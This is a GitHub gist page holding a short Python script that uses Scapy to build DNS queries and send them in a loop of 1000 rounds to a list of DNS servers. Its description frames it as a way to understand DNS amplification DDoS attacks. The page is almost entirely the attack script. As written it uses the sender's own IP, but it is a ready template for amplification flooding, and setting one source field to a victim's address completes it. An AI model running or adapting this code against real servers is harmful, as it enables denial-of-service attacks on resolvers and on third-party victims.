-
-
Save jusmistic/be1e55919b378f5ee89ff08878b3ba79 to your computer and use it in GitHub Desktop.
Better understanding DNS Amplification DDoS attacks through Python and Scapy.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
Original Version From https://gist.github.com/thom-s/7b3fcdcb88c0670167ccdd6ebca3c924 | |
""" | |
# Imports | |
from scapy.all import * | |
from pprint import pprint | |
import operator | |
# Parameters | |
interface = "eth0" # Interface you want to use | |
dns_source = "local-ip" # IP of that interface | |
dns_destination = ["ip1","ip2","ip3"] # List of DNS Server IPs | |
time_to_live = 128 # IP TTL | |
query_name = "google.com" # DNS Query Name | |
#query_type = ["ANY", "A","AAAA","CNAME","MX","NS","PTR","CERT","SRV","TXT", "SOA"] # DNS Query Types | |
query_type = ["TXT"] # DNS Query Types | |
loop = 1000 | |
# Initialise variables | |
results = [] | |
packet_number=0 | |
# Loop through all query types then all DNS servers | |
for _ in range(loop): | |
for i in range(0,len(query_type)): | |
for j in range(0, len(dns_destination)): | |
packet_number += 1 | |
# Craft the DNS query packet with scapy | |
packet = IP(src=dns_source, dst=dns_destination[j], ttl=time_to_live) / UDP() / DNS(rd=1, qd=DNSQR(qname=query_name, qtype=query_type[i])) | |
# Sending the packet | |
try: | |
query = sr1(packet,iface=interface,verbose=False, timeout=8) | |
print("Packet #{} sent!".format(packet_number)) | |
except: | |
print("Error sending packet #{}".format(packet_number)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment